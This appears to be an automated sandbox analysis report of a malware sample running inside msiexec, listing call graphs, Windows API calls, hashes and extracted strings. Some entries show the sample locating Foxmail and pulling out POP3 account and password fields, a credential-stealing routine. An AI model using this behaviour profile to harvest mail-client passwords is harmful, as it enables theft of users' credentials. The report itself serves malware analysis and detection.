RtlSizeHeap 6637->6638 6639 238d8aa3 6637->6639 6638->6631 6640 238d6368 __dosmaperr 20 API calls 6639->6640 6641 238d8aa8 6640->6641 6642 238d62ac _abort 26 API calls 6641->6642 6643 238d8ab3 6642->6643 6643->6631 6645 238d8ad8 6644->6645 6646 238d8ae3 6644->6646 6647 238d56d0 21 API calls 6645->6647 6648 238d8aeb 6646->6648 6654 238d8af4 __dosmaperr 6646->6654 6652 238d8ae0 6647->6652 6649 238d571e _free 20 API calls 6648->6649 6649->6652 6650 238d8b1e RtlReAllocateHeap 6650->6652 6650->6654 6651 238d8af9 6653 238d6368 __dosmaperr 20 API calls 6651->6653 6652->6636 6653->6652 6654->6650 6654->6651 6655 238d474f __dosmaperr 7 API calls 6654->6655 6655->6654 7007 238d5bff 7015 238d5d5c 7007->7015 7010 238d5c13 7011 238d5b7a __dosmaperr 20 API calls 7012 238d5c1b 7011->7012 7013 238d5c28 7012->7013 7022 238d5c2b 7012->7022 7016 238d5c45 __dosmaperr 5 API calls 7015->7016 7017 238d5d83 7016->7017 7018 238d5d9b TlsAlloc 7017->7018 7019 238d5d8c 7017->7019 7018->7019 7020 238d2ada _ValidateLocalCookies 5 API calls 7019->7020 7021 238d5c09 7020->7021 7021->7010 7021->7011 7023 238d5c35 7022->7023 7025 238d5c3b 7022->7025 7026 238d5db2 7023->7026 7025->7010 7027 238d5c45 __dosmaperr 5 API calls 7026->7027 7028 238d5dd9 7027->7028 7029 238d5df1 TlsFree 7028->7029 7032 238d5de5 7028->7032 7029->7032 7030 238d2ada _ValidateLocalCookies 5 API calls 7031 238d5e02 7030->7031 7031->7025 7032->7030 7144 238d1f3f 7145 238d1f4b ___scrt_is_nonwritable_in_current_image 7144->7145 7162 238d247c 7145->7162 7147 238d1f52 7148 238d1f7c 7147->7148 7149 238d2041 7147->7149 7156 238d1f57 ___scrt_is_nonwritable_in_current_image 7147->7156 7173 238d23de 7148->7173 7185 238d2639 IsProcessorFeaturePresent 7149->7185 7152 238d2048 7153 238d1f8b __RTC_Initialize 7153->7156 7176 238d22fc RtlInitializeSListHead 7153->7176 7155 238d1f99 ___scrt_initialize_default_local_stdio_options 7177 238d46c5 7155->7177 7160 238d1fb8 7160->7156 7161 238d4669 _abort 5 API calls 7160->7161 7161->7156 7163 238d2485 7162->7163 7189 238d2933 IsProcessorFeaturePresent 7163->7189 7167 238d2496 7172 238d249a 7167->7172 7200 238d53c8 7167->7200 7170 238d24b1 7170->7147 7172->7147 7256 238d24b5 7173->7256 7175 238d23e5 7175->7153 7176->7155 7178 238d46dc 7177->7178 7179 238d2ada _ValidateLocalCookies 5 API calls 7178->7179 7180 238d1fad 7179->7180 7180->7156 7181 238d23b3 7180->7181 7182 238d23b8 ___scrt_release_startup_lock 7181->7182 7183 238d2933 ___isa_available_init IsProcessorFeaturePresent 7182->7183 7184 238d23c1 7182->7184 7183->7184 7184->7160 7186 238d264e ___scrt_fastfail 7185->7186 7187 238d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7186->7187 7188 238d2744 ___scrt_fastfail 7187->7188 7188->7152 7190 238d2491 7189->7190 7191 238d34ea 7190->7191 7192 238d34ef ___vcrt_initialize_winapi_thunks 7191->7192 7211 238d3936 7192->7211 7195 238d34fd 7195->7167 7197 238d3505 7198 238d3510 7197->7198 7225 238d3972 7197->7225 7198->7167 7248 238d7457 7200->7248 7203 238d3529 7204 238d3543 7203->7204 7205 238d3532 7203->7205 7204->7172 7206 238d391b ___vcrt_uninitialize_ptd 6 API calls 7205->7206 7207 238d3537 7206->7207 7208 238d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7207->7208 7209 238d353c 7208->7209 7252 238d3c50 7209->7252 7212 238d393f 7211->7212 7214 238d3968 7212->7214 7215 238d34f9 7212->7215 7229 238d3be0 7212->7229 7216 238d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7214->7216 7215->7195 7217 238d38e8 7215->7217 7216->7215 7234 238d3af1 7217->7234 7220 238d3ba2 ___vcrt_FlsSetValue 6 API calls 7221 238d390b 7220->7221 7222 238d3918 7221->7222 7239 238d391b 7221->7239 7222->7197 7224 238d38fd 7224->7197 7226 238d399c 7225->7226 7227 238d397d 7225->7227 7226->7195 7228 238d3987 RtlDeleteCriticalSection 7227->7228 7228->7226 7228->7228 7230 238d3a82 try_get_function 5 API calls 7229->7230 7231 238d3bfa 7230->7231 7232 238d3c18 InitializeCriticalSectionAndSpinCount 7231->7232 7233 238d3c03 7231->7233 7232->7233 7233->7212 7235 238d3a82 try_get_function 5 API calls 7234->7235 7236 238d3b0b 7235->7236 7237 238d3b24 TlsAlloc 7236->7237 7238 238d38f2 7236->7238 7238->7220 7238->7224 7240 238d3925 7239->7240 7241 238d392b 7239->7241 7243 238d3b2c 7240->7243 7241->7224 7244 238d3a82 try_get_function 5 API calls 7243->7244 7245 238d3b46 7244->7245 7246 238d3b5e TlsFree 7245->7246 7247 238d3b52 7245->7247 7246->7247 7247->7241 7249 238d7470 7248->7249 7250 238d2ada _ValidateLocalCookies 5 API calls 7249->7250 7251 238d24a3 7250->7251 7251->7170 7251->7203 7253 238d3c59 7252->7253 7255 238d3c7f 7252->7255 7254 238d3c69 FreeLibrary 7253->7254 7253->7255 7254->7253 7255->7204 7257 238d24c8 7256->7257 7258 238d24c4 7256->7258 7259 238d24d5 ___scrt_release_startup_lock 7257->7259 7260 238d2639 ___scrt_fastfail 4 API calls 7257->7260 7258->7175 7259->7175 7261 238d2559 7260->7261 7785 238d9e71 7786 238d9e95 7785->7786 7788 238dac6b __startOneArgErrorHandling 7786->7788 7789 238d9eae 7786->7789 7787 238d9ef8 7791 238db2f0 21 API calls 7788->7791 7792 238dacad __startOneArgErrorHandling 7788->7792 7789->7787 7790 238daa53 21 API calls 7789->7790 7790->7787 7791->7792 7033 238d63f0 7034 238d6400 7033->7034 7043 238d6416 7033->7043 7035 238d6368 __dosmaperr 20 API calls 7034->7035 7036 238d6405 7035->7036 7038 238d62ac _abort 26 API calls 7036->7038 7037 238d4e76 20 API calls 7044 238d64e5 7037->7044 7039 238d640f 7038->7039 7040 238d6480 7040->7037 7040->7040 7042 238d64ee 7045 238d571e _free 20 API calls 7042->7045 7043->7040 7046 238d6561 7043->7046 7052 238d6580 7043->7052 7044->7042 7049 238d6573 7044->7049 7063 238d85eb 7044->7063 7045->7046 7072 238d679a 7046->7072 7050 238d62bc _abort 11 API calls 7049->7050 7051 238d657f 7050->7051 7053 238d658c 7052->7053 7053->7053 7054 238d637b __dosmaperr 20 API calls 7053->7054 7055 238d65ba 7054->7055 7056 238d85eb 26 API calls 7055->7056 7057 238d65e6 7056->7057 7058 238d62bc _abort 11 API calls 7057->7058 7059 238d6615 ___scrt_fastfail 7058->7059 7060 238d66b6 FindFirstFileExA 7059->7060 7061 238d6705 7060->7061 7062 238d6580 26 API calls 7061->7062 7065 238d853a 7063->7065 7064 238d854f 7066 238d6368 __dosmaperr 20 API calls 7064->7066 7067 238d8554 7064->7067 7065->7064 7065->7067 7070 238d858b 7065->7070 7068 238d857a 7066->7068 7067->7044 7069 238d62ac _abort 26 API calls 7068->7069 7069->7067 7070->7067 7071 238d6368 __dosmaperr 20 API calls 7070->7071 7071->7068 7077 238d67a4 7072->7077 7073 238d67b4 7075 238d571e _free 20 API calls 7073->7075 7074 238d571e _free 20 API calls 7074->7077 7076 238d67bb 7075->7076 7076->7039 7077->7073 7077->7074 7262 238d5630 7263 238d563b 7262->7263 7264 238d5eb7 11 API calls 7263->7264 7265 238d5664 7263->7265 7266 238d5660 7263->7266 7264->7263 7268 238d5688 7265->7268 7269 238d56b4 7268->7269 7270 238d5695 7268->7270 7269->7266 7271 238d569f RtlDeleteCriticalSection 7270->7271 7271->7269 7271->7271 7793 238d3370 7804 238d3330 7793->7804 7805 238d334f 7804->7805 7806 238d3342 7804->7806 7807 238d2ada _ValidateLocalCookies 5 API calls 7806->7807 7807->7805 6660 238d3eb3 6661 238d5411 38 API calls 6660->6661 6662 238d3ebb 6661->6662

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 238D1137
                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 238D1151
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D115C
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D116D
                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D117C
                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 238D1193
                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 238D11D0
                                                                      • FindClose.KERNEL32(00000000), ref: 238D11DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                      • String ID:
                                                                      • API String ID: 1083526818-0
                                                                      • Opcode ID: 097a71dfae285f0353923be7ae3e1e1e830af3c6379bd29e621fdb69c253eb55
                                                                      • Instruction ID: 331b48dca0fa47941d966a2c393f98fe09248e8038e48d1e7b54769956f9ea96
                                                                      • Opcode Fuzzy Hash: 097a71dfae285f0353923be7ae3e1e1e830af3c6379bd29e621fdb69c253eb55
                                                                      • Instruction Fuzzy Hash: C921937254430CABD720EBB4DC48F9B7B9CEF84314F04092AB958D7190EB74D619C796

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 238D1434
                                                                        • Part of subcall function 238D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 238D1137
                                                                        • Part of subcall function 238D10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 238D1151
                                                                        • Part of subcall function 238D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D115C
                                                                        • Part of subcall function 238D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D116D
                                                                        • Part of subcall function 238D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 238D117C
                                                                        • Part of subcall function 238D10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 238D1193
                                                                        • Part of subcall function 238D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 238D11D0
                                                                        • Part of subcall function 238D10F1: FindClose.KERNEL32(00000000), ref: 238D11DB
                                                                      • lstrlenW.KERNEL32(?), ref: 238D14C5
                                                                      • lstrlenW.KERNEL32(?), ref: 238D14E0
                                                                      • lstrlenW.KERNEL32(?,?), ref: 238D150F
                                                                      • lstrcatW.KERNEL32(00000000), ref: 238D1521
                                                                      • lstrlenW.KERNEL32(?,?), ref: 238D1547
                                                                      • lstrcatW.KERNEL32(00000000), ref: 238D1553
                                                                      • lstrlenW.KERNEL32(?,?), ref: 238D1579
                                                                      • lstrcatW.KERNEL32(00000000), ref: 238D1585
                                                                      • lstrlenW.KERNEL32(?,?), ref: 238D15AB
                                                                      • lstrcatW.KERNEL32(00000000), ref: 238D15B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                      • API String ID: 672098462-2938083778
                                                                      • Opcode ID: 532ba8b0b8b096fbc5dcb219b1c0f4d10ad97092d93d1e54c86247ce4af53309
                                                                      • Instruction ID: 35482fe088d8928a690dbad69869a35a98e8b4189a1835d72684d571b575afdb
                                                                      • Opcode Fuzzy Hash: 532ba8b0b8b096fbc5dcb219b1c0f4d10ad97092d93d1e54c86247ce4af53309
                                                                      • Instruction Fuzzy Hash: 5581AE72A1035CA9DB20DBE5DC85FEE7379EF89700F0005E6F508EB190EA715A85CB95
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 238D61DA
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 238D61E4
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 238D61F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: cecac2d97bd30fec21a9a0702564b0558804815aa5ed9926a03e47eb4f1d0f26
                                                                      • Instruction ID: 0af119d3bf62af646db6ffc32c7fe307c8492b8f8525c69845773c137963bc19
                                                                      • Opcode Fuzzy Hash: cecac2d97bd30fec21a9a0702564b0558804815aa5ed9926a03e47eb4f1d0f26
                                                                      • Instruction Fuzzy Hash: DF31B27591121CDBCB21DF68D988B8DBBB8AF18310F5041DAE81CAB250E7749F95CF45
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,238D4A8A,?,238E2238,0000000C,238D4BBD,00000000,00000000,?,238D2082,238E2108,0000000C,238D1F3A,?), ref: 238D4AD5
                                                                      • TerminateProcess.KERNEL32(00000000,?,238D4A8A,?,238E2238,0000000C,238D4BBD,00000000,00000000,?,238D2082,238E2108,0000000C,238D1F3A,?), ref: 238D4ADC
                                                                      • ExitProcess.KERNEL32 ref: 238D4AEE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: a06e65325ea4057a425831491e6b92a869b6347fe2ca4e4fdd1bd04ac0310596
                                                                      • Instruction ID: ca718d095f8edbb788ea3f9ad597224b4c56431efa8b0563a6be21395601828a
                                                                      • Opcode Fuzzy Hash: a06e65325ea4057a425831491e6b92a869b6347fe2ca4e4fdd1bd04ac0310596
                                                                      • Instruction Fuzzy Hash: 4AE0123220060CEFCB05BFB8DD08A493B29AFA1341F504060FA068F021EB39DD56CA44
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: ee49c368015c8966002d7644696df863bceddb516bca2b89121654eb43f10757
                                                                      • Instruction ID: 86c8b93cb64118709203aa8a97d724f38f28a21e2d0c4ec08b261a7d05fadd0f
                                                                      • Opcode Fuzzy Hash: ee49c368015c8966002d7644696df863bceddb516bca2b89121654eb43f10757
                                                                      • Instruction Fuzzy Hash: 5831E57290020DEFCB149FB8CC84EEA7BBDDB85314F4442E9E9199B251E6319E45CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: 760391fdbb33de7f51cd7fac74cfba87ebffa3c574fb0ac98096708dc2d69e2e
                                                                      • Instruction ID: e6721c41e8c52c2b2e6b838f0e4925f269f39ef9753454185bdfefc5b9de2ce1
                                                                      • Opcode Fuzzy Hash: 760391fdbb33de7f51cd7fac74cfba87ebffa3c574fb0ac98096708dc2d69e2e
                                                                      • Instruction Fuzzy Hash: 24A01130200A028F8300AE30820A20C3AACAAA228030000AAA80AC8000FB28C8208A00

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 238D1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D1B
                                                                        • Part of subcall function 238D1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 238D1D37
                                                                        • Part of subcall function 238D1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 238D1D4B
                                                                      • _strlen.LIBCMT ref: 238D1855
                                                                      • _strlen.LIBCMT ref: 238D1869
                                                                      • _strlen.LIBCMT ref: 238D188B
                                                                      • _strlen.LIBCMT ref: 238D18AE
                                                                      • _strlen.LIBCMT ref: 238D18C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen$File$CopyCreateDelete
                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                      • API String ID: 3296212668-3023110444
                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                      • Instruction ID: f77c2e8fbc009642183109e1664f3277a9ada2e983551a5c86971ac3a106e1b8
                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                      • Instruction Fuzzy Hash: C661DF7290031CEAEF659BF8D840BEEB7B9AF19200F4440D6D206AF254EB745A47CB56

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                      • API String ID: 4218353326-230879103
                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                      • Instruction ID: 84bfd9dad38482e18615ded60ab106aacfc629211278cb84b9806c94d8a42e99
                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                      • Instruction Fuzzy Hash: 8571E973D0032C9BDB25ABF89894AEF7BFD9F19200F1440D6D544DB141EA74978ACB60

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 203 238d7cc2-238d7cd6 204 238d7cd8-238d7cdd 203->204 205 238d7d44-238d7d4c 203->205 204->205 206 238d7cdf-238d7ce4 204->206 207 238d7d4e-238d7d51 205->207 208 238d7d93-238d7dab call 238d7e35 205->208 206->205 209 238d7ce6-238d7ce9 206->209 207->208 211 238d7d53-238d7d90 call 238d571e * 4 207->211 217 238d7dae-238d7db5 208->217 209->205 212 238d7ceb-238d7cf3 209->212 211->208 215 238d7d0d-238d7d15 212->215 216 238d7cf5-238d7cf8 212->216 222 238d7d2f-238d7d43 call 238d571e * 2 215->222 223 238d7d17-238d7d1a 215->223 216->215 219 238d7cfa-238d7d0c call 238d571e call 238d90ba 216->219 220 238d7dd4-238d7dd8 217->220 221 238d7db7-238d7dbb 217->221 219->215 231 238d7dda-238d7ddf 220->231 232 238d7df0-238d7dfc 220->232 227 238d7dbd-238d7dc0 221->227 228 238d7dd1 221->228 222->205 223->222 229 238d7d1c-238d7d2e call 238d571e call 238d91b8 223->229 227->228 236 238d7dc2-238d7dd0 call 238d571e * 2 227->236 228->220 229->222 239 238d7ded 231->239 240 238d7de1-238d7de4 231->240 232->217 234 238d7dfe-238d7e0b call 238d571e 232->234 236->228 239->232 240->239 247 238d7de6-238d7dec call 238d571e 240->247 247->239
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 238D7D06
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D90D7
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D90E9
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D90FB
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D910D
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D911F
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D9131
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D9143
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D9155
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D9167
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D9179
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D918B
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D919D
                                                                        • Part of subcall function 238D90BA: _free.LIBCMT ref: 238D91AF
                                                                      • _free.LIBCMT ref: 238D7CFB
                                                                        • Part of subcall function 238D571E: HeapFree.KERNEL32(00000000,00000000,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?), ref: 238D5734
                                                                        • Part of subcall function 238D571E: GetLastError.KERNEL32(?,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?,?), ref: 238D5746
                                                                      • _free.LIBCMT ref: 238D7D1D
                                                                      • _free.LIBCMT ref: 238D7D32
                                                                      • _free.LIBCMT ref: 238D7D3D
                                                                      • _free.LIBCMT ref: 238D7D5F
                                                                      • _free.LIBCMT ref: 238D7D72
                                                                      • _free.LIBCMT ref: 238D7D80
                                                                      • _free.LIBCMT ref: 238D7D8B
                                                                      • _free.LIBCMT ref: 238D7DC3
                                                                      • _free.LIBCMT ref: 238D7DCA
                                                                      • _free.LIBCMT ref: 238D7DE7
                                                                      • _free.LIBCMT ref: 238D7DFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: cca3122dd7a7f49a70ec637faab1f2690a340800fffe2938a86a95feee27a115
                                                                      • Instruction ID: 70aad70906a4a1daa7dadeb7c768bff1d68b2eb5990006fa6d3db97b53becda7
                                                                      • Opcode Fuzzy Hash: cca3122dd7a7f49a70ec637faab1f2690a340800fffe2938a86a95feee27a115
                                                                      • Instruction Fuzzy Hash: 62312A3360030CDFEB21AEB9D940F6AB7E9AF00214F2454AAF849DF159DF35A980CB14

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _free.LIBCMT ref: 238D59EA
                                                                        • Part of subcall function 238D571E: HeapFree.KERNEL32(00000000,00000000,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?), ref: 238D5734
                                                                        • Part of subcall function 238D571E: GetLastError.KERNEL32(?,?,238D924F,?,00000000,?,00000000,?,238D9276,?,00000007,?,?,238D7E5A,?,?), ref: 238D5746
                                                                      • _free.LIBCMT ref: 238D59F6
                                                                      • _free.LIBCMT ref: 238D5A01
                                                                      • _free.LIBCMT ref: 238D5A0C
                                                                      • _free.LIBCMT ref: 238D5A17
                                                                      • _free.LIBCMT ref: 238D5A22
                                                                      • _free.LIBCMT ref: 238D5A2D
                                                                      • _free.LIBCMT ref: 238D5A38
                                                                      • _free.LIBCMT ref: 238D5A43
                                                                      • _free.LIBCMT ref: 238D5A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3329531235.00000000238D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 238D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.3329512631.00000000238D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.3329531235.00000000238E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_238d0000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 78ec9685bc3751ef9f5989ef4e5319143a3986a42637834a7417265d4b9b2ed3
                                                                      • Instruction ID: ee4f9a12049ee67922c5b641348733e479ec6c2664ca2056eced40a911d9d879
                                                                      • Opcode Fuzzy Hash: 78ec9685bc3751ef9f5989ef4e5319143a3986a42637834a7417265d4b9b2ed3
                                                                      • Instruction Fuzzy Hash: 5211637A52024CEFCB21DFA8D841CDD3FA5EF14250F6551E6BA088F225DB32DA50DB80

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 287 238daa53-238daa6e 288 238daa80 287->288 289 238daa70-238daa7e RtlDecodePointer 287->289 290 238daa85-238daa8b 288->290 289->290 291 238daa91 290->291 292 238dabb2-238dabb5 290->292 293 238daa97-238daa9a 291->293 294 238daba6 291->294 295 238dabb7-238dabba 292->295 296 238dac12 292->296 300 238dab47-238dab4a 293->300 301 238daaa0 293->301 299 238daba8-238dabad 294->299 297 238dabbc-238dabbf 295->297 298 238dac06 295->298 302 238dac19 296->302 306 238dabfa 297->306 307 238dabc1-238dabc4 297->307 298->296 310 238dac5b-238dac6a call 238d2ada 299->310 308 238dab9d-238daba4 300->308 309 238dab4c-238dab4f 300->309 303 238dab34-238dab42 301->303 304 238daaa6-238daaab 301->304 305 238dac20-238dac49 302->305 303->305 311 238daaad-238daab0 304->311 312 238dab25-238dab2f 304->312 334 238dac4b-238dac50 call 238d6368 305->334 335 238dac56-238dac59 305->335 306->298 313 238dabee 307->313 314 238dabc6-238dabc9 307->314 318 238dab61-238dab8f 308->318 315 238dab94-238dab9b 309->315 316 238dab51-238dab54 309->316 319 238dab1c-238dab23 311->319 320 238daab2-238daab5 311->320 312->305 313->306 322 238dabcb-238dabd0 314->322 323 238dabe2 314->323 315->302 316->310 324 238dab5a 316->324 318->335 331 238daac7-238daaf7 319->331 326 238dab0d-238dab17 320->326 327 238daab7-238daaba 320->327 328 238dabdb-238dabe0 322->328 329 238dabd2-238dabd5 322->329 323->313 324->318 326->305 327->310 332 238daac0 327->332 328->299 329->310 329->328 331->335 341 238daafd-238dab08 call 238d6368 331->341 332->331 334->335 335->310 341->335
                                                                      APIs
